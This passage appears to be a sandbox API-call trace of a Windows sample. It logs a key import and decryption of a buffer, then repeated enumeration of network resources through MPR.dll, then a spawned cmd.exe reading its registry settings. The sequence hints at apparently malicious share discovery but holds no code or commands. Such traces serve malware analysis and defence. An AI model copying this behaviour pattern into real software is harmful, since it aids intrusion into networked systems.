hHeap=0x600000) returned 1 [0097.785] GetProcessHeap () returned 0x600000 [0097.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616500 | out: hHeap=0x600000) returned 1 [0097.785] GetProcessHeap () returned 0x600000 [0097.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6164f0 | out: hHeap=0x600000) returned 1 [0097.785] GetProcessHeap () returned 0x600000 [0097.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615de0 | out: hHeap=0x600000) returned 1 [0097.785] GetProcessHeap () returned 0x600000 [0097.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616510 | out: hHeap=0x600000) returned 1 [0097.785] GetProcessHeap () returned 0x600000 [0097.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616530 | out: hHeap=0x600000) returned 1 [0097.785] GetProcessHeap () returned 0x600000 [0097.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616520 | out: hHeap=0x600000) returned 1 [0097.785] GetProcessHeap () returned 0x600000 [0097.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616550 | out: hHeap=0x600000) returned 1 [0097.785] GetProcessHeap () returned 0x600000 [0097.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616540 | out: hHeap=0x600000) returned 1 [0097.785] GetProcessHeap () returned 0x600000 [0097.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616570 | out: hHeap=0x600000) returned 1 [0097.785] GetProcessHeap () returned 0x600000 [0097.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616560 | out: hHeap=0x600000) returned 1 [0097.785] GetProcessHeap () returned 0x600000 [0097.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616758 | out: hHeap=0x600000) returned 1 [0097.785] GetProcessHeap () returned 0x600000 [0097.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616580 | out: hHeap=0x600000) returned 1 [0097.785] GetProcessHeap () returned 0x600000 [0097.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616778 | out: hHeap=0x600000) returned 1 [0097.785] GetProcessHeap () returned 0x600000 [0097.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616768 | out: hHeap=0x600000) returned 1 [0097.785] GetProcessHeap () returned 0x600000 [0097.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616798 | out: hHeap=0x600000) returned 1 [0097.786] GetProcessHeap () returned 0x600000 [0097.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616788 | out: hHeap=0x600000) returned 1 [0097.786] GetProcessHeap () returned 0x600000 [0097.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6167b8 | out: hHeap=0x600000) returned 1 [0097.786] GetProcessHeap () returned 0x600000 [0097.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6167a8 | out: hHeap=0x600000) returned 1 [0097.786] GetProcessHeap () returned 0x600000 [0097.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615df8 | out: hHeap=0x600000) returned 1 [0097.786] GetProcessHeap () returned 0x600000 [0097.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6167c8 | out: hHeap=0x600000) returned 1 [0097.786] GetProcessHeap () returned 0x600000 [0097.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6167e8 | out: hHeap=0x600000) returned 1 [0097.786] GetProcessHeap () returned 0x600000 [0097.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6167d8 | out: hHeap=0x600000) returned 1 [0097.786] GetProcessHeap () returned 0x600000 [0097.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616110 | out: hHeap=0x600000) returned 1 [0097.786] GetProcessHeap () returned 0x600000 [0097.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6167f8 | out: hHeap=0x600000) returned 1 [0097.786] GetProcessHeap () returned 0x600000 [0097.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615e10 | out: hHeap=0x600000) returned 1 [0097.786] GetProcessHeap () returned 0x600000 [0097.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616808 | out: hHeap=0x600000) returned 1 [0097.786] GetProcessHeap () returned 0x600000 [0097.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615e28 | out: hHeap=0x600000) returned 1 [0097.786] GetProcessHeap () returned 0x600000 [0097.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616818 | out: hHeap=0x600000) returned 1 [0097.786] GetProcessHeap () returned 0x600000 [0097.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616838 | out: hHeap=0x600000) returned 1 [0097.786] GetProcessHeap () returned 0x600000 [0097.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616828 | out: hHeap=0x600000) returned 1 [0097.787] GetProcessHeap () returned 0x600000 [0097.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615e40 | out: hHeap=0x600000) returned 1 [0097.787] GetProcessHeap () returned 0x600000 [0097.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616848 | out: hHeap=0x600000) returned 1 [0097.787] GetProcessHeap () returned 0x600000 [0097.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615e58 | out: hHeap=0x600000) returned 1 [0097.787] GetProcessHeap () returned 0x600000 [0097.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616858 | out: hHeap=0x600000) returned 1 [0097.787] GetProcessHeap () returned 0x600000 [0097.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616210 | out: hHeap=0x600000) returned 1 [0097.787] GetProcessHeap () returned 0x600000 [0097.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615e70 | out: hHeap=0x600000) returned 1 [0097.787] GetProcessHeap () returned 0x600000 [0097.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616878 | out: hHeap=0x600000) returned 1 [0097.787] GetProcessHeap () returned 0x600000 [0097.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615e88 | out: hHeap=0x600000) returned 1 [0097.787] GetProcessHeap () returned 0x600000 [0097.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616888 | out: hHeap=0x600000) returned 1 [0097.787] GetProcessHeap () returned 0x600000 [0097.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616130 | out: hHeap=0x600000) returned 1 [0097.787] GetProcessHeap () returned 0x600000 [0097.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616898 | out: hHeap=0x600000) returned 1 [0097.787] GetProcessHeap () returned 0x600000 [0097.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616150 | out: hHeap=0x600000) returned 1 [0097.787] GetProcessHeap () returned 0x600000 [0097.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6168a8 | out: hHeap=0x600000) returned 1 [0097.787] GetProcessHeap () returned 0x600000 [0097.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614420 | out: hHeap=0x600000) returned 1 [0097.787] GetProcessHeap () returned 0x600000 [0097.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6168b8 | out: hHeap=0x600000) returned 1 [0097.788] GetProcessHeap () returned 0x600000 [0097.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616680 | out: hHeap=0x600000) returned 1 [0097.788] GetProcessHeap () returned 0x600000 [0097.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6168c8 | out: hHeap=0x600000) returned 1 [0097.788] GetProcessHeap () returned 0x600000 [0097.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6168e8 | out: hHeap=0x600000) returned 1 [0097.788] GetProcessHeap () returned 0x600000 [0097.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6168d8 | out: hHeap=0x600000) returned 1 [0097.788] GetProcessHeap () returned 0x600000 [0097.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614470 | out: hHeap=0x600000) returned 1 [0097.788] GetProcessHeap () returned 0x600000 [0097.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6168f8 | out: hHeap=0x600000) returned 1 [0097.788] GetProcessHeap () returned 0x600000 [0097.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x600000) returned 1 [0097.788] GetProcessHeap () returned 0x600000 [0097.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616908 | out: hHeap=0x600000) returned 1 [0097.788] GetProcessHeap () returned 0x600000 [0097.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616928 | out: hHeap=0x600000) returned 1 [0097.788] GetProcessHeap () returned 0x600000 [0097.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616918 | out: hHeap=0x600000) returned 1 [0097.788] GetProcessHeap () returned 0x600000 [0097.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616948 | out: hHeap=0x600000) returned 1 [0097.788] GetProcessHeap () returned 0x600000 [0097.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616938 | out: hHeap=0x600000) returned 1 [0097.788] GetProcessHeap () returned 0x600000 [0097.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616868 | out: hHeap=0x600000) returned 1 [0097.789] GetProcessHeap () returned 0x600000 [0097.789] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6166b0 | out: hHeap=0x600000) returned 1 [0097.789] GetProcessHeap () returned 0x600000 [0097.789] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616170 | out: hHeap=0x600000) returned 1 [0097.789] GetProcessHeap () returned 0x600000 [0097.789] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6144c0 | out: hHeap=0x600000) returned 1 [0097.789] GetProcessHeap () returned 0x600000 [0097.789] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616968 | out: hHeap=0x600000) returned 1 [0097.789] GetProcessHeap () returned 0x600000 [0097.789] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616958 | out: hHeap=0x600000) returned 1 [0097.789] GetProcessHeap () returned 0x600000 [0097.789] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616988 | out: hHeap=0x600000) returned 1 [0097.789] GetProcessHeap () returned 0x600000 [0097.789] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6151d8 | out: hHeap=0x600000) returned 1 [0097.789] CryptReleaseContext (hProv=0x614968, dwFlags=0x0) returned 1 [0097.789] GetProcessHeap () returned 0x600000 [0097.789] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6147f0 | out: hHeap=0x600000) returned 1 [0097.789] GetProcessHeap () returned 0x600000 [0097.789] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x610e20 | out: hHeap=0x600000) returned 1 [0097.789] ExitProcess (uExitCode=0x0) Thread: id = 4 os_tid = 0xb0 [0052.523] GetProcessHeap () returned 0x600000 [0052.523] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40) returned 0x6173a0 [0052.523] CryptImportKey (in: hProv=0x614968, pbData=0x35ff00, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x6185d0) returned 1 [0052.523] CryptDecrypt (in: hKey=0x6185d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6173a0, pdwDataLen=0x35ff64 | out: pbData=0x6173a0, pdwDataLen=0x35ff64) returned 1 [0052.524] CryptDestroyKey (hKey=0x6185d0) returned 1 [0052.524] GetProcessHeap () returned 0x600000 [0052.524] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x615f00 [0052.524] GetProcessHeap () returned 0x600000 [0052.524] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616998 [0052.524] GetProcessHeap () returned 0x600000 [0052.524] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12) returned 0x6186b0 [0052.524] GetProcessHeap () returned 0x600000 [0052.524] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x615ee8 [0052.524] GetProcessHeap () returned 0x600000 [0052.524] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x615ed0 [0052.524] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75600000 [0056.033] GetProcAddress (hModule=0x75600000, lpProcName="WNetEnumResourceW") returned 0x75603058 [0056.033] GetProcAddress (hModule=0x75600000, lpProcName="WNetOpenEnumW") returned 0x75602f06 [0056.033] GetProcAddress (hModule=0x75600000, lpProcName="WNetCloseEnum") returned 0x75602dd6 [0056.033] GetProcessHeap () returned 0x600000 [0056.033] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6173a0 | out: hHeap=0x600000) returned 1 [0056.033] GetProcessHeap () returned 0x600000 [0056.033] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616998 | out: hHeap=0x600000) returned 1 [0056.033] GetProcessHeap () returned 0x600000 [0056.033] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6186b0 | out: hHeap=0x600000) returned 1 [0056.033] GetProcessHeap () returned 0x600000 [0056.033] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615ee8 | out: hHeap=0x600000) returned 1 [0056.033] GetProcessHeap () returned 0x600000 [0056.033] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615ed0 | out: hHeap=0x600000) returned 1 [0056.033] GetProcessHeap () returned 0x600000 [0056.033] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615f00 | out: hHeap=0x600000) returned 1 [0056.033] GetProcessHeap () returned 0x600000 [0056.033] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4000) returned 0x6192f0 [0056.034] WNetOpenEnumW (in: dwScope=0x1, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x35ff38 | out: lphEnum=0x35ff38*=0x61dca8) returned 0x0 [0062.561] WNetEnumResourceW (in: hEnum=0x61dca8, lpcCount=0x35ff34, lpBuffer=0x6192f0, lpBufferSize=0x35ff3c | out: lpcCount=0x35ff34, lpBuffer=0x6192f0, lpBufferSize=0x35ff3c) returned 0x103 [0062.561] WNetCloseEnum (hEnum=0x61dca8) returned 0x0 [0062.561] GetProcessHeap () returned 0x600000 [0062.561] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6192f0 | out: hHeap=0x600000) returned 1 [0062.561] GetProcessHeap () returned 0x600000 [0062.561] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4000) returned 0x6192f0 [0062.561] WNetOpenEnumW (in: dwScope=0x4, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x35ff38 | out: lphEnum=0x35ff38*=0x6188d0) returned 0x0 [0062.562] WNetEnumResourceW (in: hEnum=0x6188d0, lpcCount=0x35ff34, lpBuffer=0x6192f0, lpBufferSize=0x35ff3c | out: lpcCount=0x35ff34, lpBuffer=0x6192f0, lpBufferSize=0x35ff3c) returned 0x103 [0062.563] WNetCloseEnum (hEnum=0x6188d0) returned 0x0 [0062.563] GetProcessHeap () returned 0x600000 [0062.563] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6192f0 | out: hHeap=0x600000) returned 1 [0062.563] GetProcessHeap () returned 0x600000 [0062.563] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4000) returned 0x6192f0 [0062.563] WNetOpenEnumW (in: dwScope=0x5, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x35ff38 | out: lphEnum=0x35ff38*=0x61dca8) returned 0x0 [0081.080] WNetEnumResourceW (in: hEnum=0x61dca8, lpcCount=0x35ff34, lpBuffer=0x6192f0, lpBufferSize=0x35ff3c | out: lpcCount=0x35ff34, lpBuffer=0x6192f0, lpBufferSize=0x35ff3c) returned 0x0 [0081.080] WNetEnumResourceW (in: hEnum=0x61dca8, lpcCount=0x35ff34, lpBuffer=0x6192f0, lpBufferSize=0x35ff3c | out: lpcCount=0x35ff34, lpBuffer=0x6192f0, lpBufferSize=0x35ff3c) returned 0x103 [0081.080] WNetCloseEnum (hEnum=0x61dca8) returned 0x0 [0081.080] GetProcessHeap () returned 0x600000 [0081.080] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6192f0 | out: hHeap=0x600000) returned 1 [0081.081] GetProcessHeap () returned 0x600000 [0081.081] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4000) returned 0x6192f0 [0081.081] WNetOpenEnumW (in: dwScope=0x3, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x35ff38 | out: lphEnum=0x35ff38*=0x6188f0) returned 0x0 [0081.083] WNetEnumResourceW (in: hEnum=0x6188f0, lpcCount=0x35ff34, lpBuffer=0x6192f0, lpBufferSize=0x35ff3c | out: lpcCount=0x35ff34, lpBuffer=0x6192f0, lpBufferSize=0x35ff3c) returned 0x103 [0081.084] WNetCloseEnum (hEnum=0x6188f0) returned 0x0 [0081.084] GetProcessHeap () returned 0x600000 [0081.084] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6192f0 | out: hHeap=0x600000) returned 1 [0081.084] GetProcessHeap () returned 0x600000 [0081.084] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4000) returned 0x6192f0 [0081.084] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x35ff38 | out: lphEnum=0x35ff38*=0x61dca8) returned 0x0 [0081.084] WNetEnumResourceW (in: hEnum=0x61dca8, lpcCount=0x35ff34, lpBuffer=0x6192f0, lpBufferSize=0x35ff3c | out: lpcCount=0x35ff34, lpBuffer=0x6192f0, lpBufferSize=0x35ff3c) returned 0x0 [0081.084] GetProcessHeap () returned 0x600000 [0081.084] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4000) returned 0x626d88 [0081.084] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x6192f0, lphEnum=0x35ff00 | out: lphEnum=0x35ff00*=0x6188f0) returned 0x0 [0081.090] WNetEnumResourceW (in: hEnum=0x6188f0, lpcCount=0x35fefc, lpBuffer=0x626d88, lpBufferSize=0x35ff04 | out: lpcCount=0x35fefc, lpBuffer=0x626d88, lpBufferSize=0x35ff04) returned 0x103 [0081.090] WNetCloseEnum (hEnum=0x6188f0) returned 0x0 [0081.090] GetProcessHeap () returned 0x600000 [0081.090] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x626d88 | out: hHeap=0x600000) returned 1 [0081.090] GetProcessHeap () returned 0x600000 [0081.090] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4000) returned 0x626d88 [0081.090] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x619310, lphEnum=0x35ff00 | out: lphEnum=0x35ff00*=0x0) returned 0x4b8 [0097.249] GetProcessHeap () returned 0x600000 [0097.250] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x626d88 | out: hHeap=0x600000) returned 1 [0097.250] GetProcessHeap () returned 0x600000 [0097.250] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4000) returned 0x626d88 [0097.250] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x619330, lphEnum=0x35ff00 | out: lphEnum=0x35ff00*=0x0) returned 0x4c6 [0097.251] GetProcessHeap () returned 0x600000 [0097.251] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x626d88 | out: hHeap=0x600000) returned 1 [0097.252] WNetEnumResourceW (in: hEnum=0x61dca8, lpcCount=0x35ff34, lpBuffer=0x6192f0, lpBufferSize=0x35ff3c | out: lpcCount=0x35ff34, lpBuffer=0x6192f0, lpBufferSize=0x35ff3c) returned 0x103 [0097.252] WNetCloseEnum (hEnum=0x61dca8) returned 0x0 [0097.252] GetProcessHeap () returned 0x600000 [0097.252] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6192f0 | out: hHeap=0x600000) returned 1 Thread: id = 11 os_tid = 0x244 Thread: id = 12 os_tid = 0x15c Thread: id = 43 os_tid = 0x97c Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x415c1000" os_pid = "0x1c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa30" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 5 os_tid = 0x5f4 [0057.071] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf870 | out: lpSystemTimeAsFileTime=0x2cf870*(dwLowDateTime=0xf0e19510, dwHighDateTime=0x1d63e6c)) [0057.071] GetCurrentProcessId () returned 0x1c4 [0057.071] GetCurrentThreadId () returned 0x5f4 [0057.071] GetTickCount () returned 0x1146c6a [0057.071] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf878 | out: lpPerformanceCount=0x2cf878*=17570452420) returned 1 [0057.073] GetModuleHandleW (lpModuleName=0x0) returned 0x49f30000 [0057.073] __set_app_type (_Type=0x1) [0057.073] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f57810) returned 0x0 [0057.073] __getmainargs (in: _Argc=0x49f7a608, _Argv=0x49f7a618, _Env=0x49f7a610, _DoWildCard=0, _StartInfo=0x49f5e0f4 | out: _Argc=0x49f7a608, _Argv=0x49f7a618, _Env=0x49f7a610) returned 0 [0057.073] GetCurrentThreadId () returned 0x5f4 [0057.073] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5f4) returned 0x3c [0057.085] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0057.085] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0057.085] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0057.085] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0057.085] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf808 | out: phkResult=0x2cf808*=0x0) returned 0x2 [0057.086] VirtualQuery (in: lpAddress=0x2cf7f0, lpBuffer=0x2cf770, dwLength=0x30 | out: lpBuffer=0x2cf770*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0057.086] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf770, dwLength=0x30 | out: lpBuffer=0x2cf770*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0057.086] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf770, dwLength=0x30 | out: lpBuffer=0x2cf770*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0057.086] VirtualQuery (in: lpAddress=0x1d4000, lpBuffer=0x2cf770, dwLength=0x30 | out: lpBuffer=0x2cf770*(BaseAddress=0x1d4000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0057.086] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf770, dwLength=0x30 | out: lpBuffer=0x2cf770*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0057.086] GetConsoleOutputCP () returned 0x1b5 [0057.086] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f6bfe0 | out: lpCPInfo=0x49f6bfe0) returned 1 [0057.086] SetConsoleCtrlHandler (HandlerRoutine=0x49f53184, Add=1) returned 1 [0057.086] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.086] SetConsoleMode (hConsoleHandle=0x10c, dwMode=0x0) returned 0 [0057.087] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.087] GetConsoleMode (in: hConsoleHandle=0x10c, lpMode=0x49f5e194 | out: lpMode=0x49f5e194) returned 0 [0057.087] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.087] GetConsoleMode (in: hConsoleHandle=0xa4, lpMode=0x49f5e198 | out: lpMode=0x49f5e198) returned 0 [0057.087] GetEnvironmentStringsW () returned 0x3f8a60* [0057.087] GetProcessHeap () returned 0x3e0000 [0057.087] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa7c) returned 0x3f94f0 [0057.087] FreeEnvironmentStringsW (penv=0x3f8a60) returned 1 [0057.087] GetProcessHeap () returned 0x3e0000 [0057.087] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x8) returned 0x3f88e0 [0057.087] GetEnvironmentStringsW () returned 0x3f8a60* [0057.087] GetProcessHeap () returned 0x3e0000 [0057.087] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa7c) returned 0x3f9f80 [0057.087] FreeEnvironmentStringsW (penv=0x3f8a60) returned 1 [0057.088] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce6c8 | out: phkResult=0x2ce6c8*=0x44) returned 0x0 [0057.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce6c0, lpData=0x2ce6e0, lpcbData=0x2ce6c4*=0x1000 | out: lpType=0x2ce6c0*=0x0, lpData=0x2ce6e0*=0x18, lpcbData=0x2ce6c4*=0x1000) returned 0x2 [0057.088] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce6c0, lpData=0x2ce6e0, lpcbData=0x2ce6c4*=0x1000 | out: lpType=0x2ce6c0*=0x4, lpData=0x2ce6e0*=0x1, lpcbData=0x2ce6c4*=0x4) returned 0x0 [0057.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce6c0, lpData=0x2ce6e0, lpcbData=0x2ce6c4*=0x1000 | out: lpType=0x2ce6c0*=0x0, lpData=0x2ce6e0*=0x1, lpcbData=0x2ce6c4*=0x1000) returned 0x2 [0057.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce6c0, lpData=0x2ce6e0, lpcbData=0x2ce6c4*=0x1000 | out: lpType=0x2ce6c0*=0x4, lpData=0x2ce6e0*=0x0, lpcbData=0x2ce6c4*=0x4) returned 0x0 [0057.088] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce6c0, lpData=0x2ce6e0, lpcbData=0x2ce6c4*=0x1000 | out: lpType=0x2ce6c0*=0x4, lpData=0x2ce6e0*=0x40, lpcbData=0x2ce6c4*=0x4) returned 0x0 [0057.088] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce6c0, lpData=0x2ce6e0, lpcbData=0x2ce6c4*=0x1000 | out: lpType=0x2ce6c0*=0x4, lpData=0x2ce6e0*=0x40, lpcbData=0x2ce6c4*=0x4) returned 0x0 [0057.088] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce6c0, lpData=0x2ce6e0, lpcbData=0x2ce6c4*=0x1000 | out: lpType=0x2ce6c0*=0x0, lpData=0x2ce6e0*=0x40, lpcbData=0x2ce6c4*=0x1000) returned 0x2 [0057.088] RegCloseKey (hKey=0x44) returned 0x0 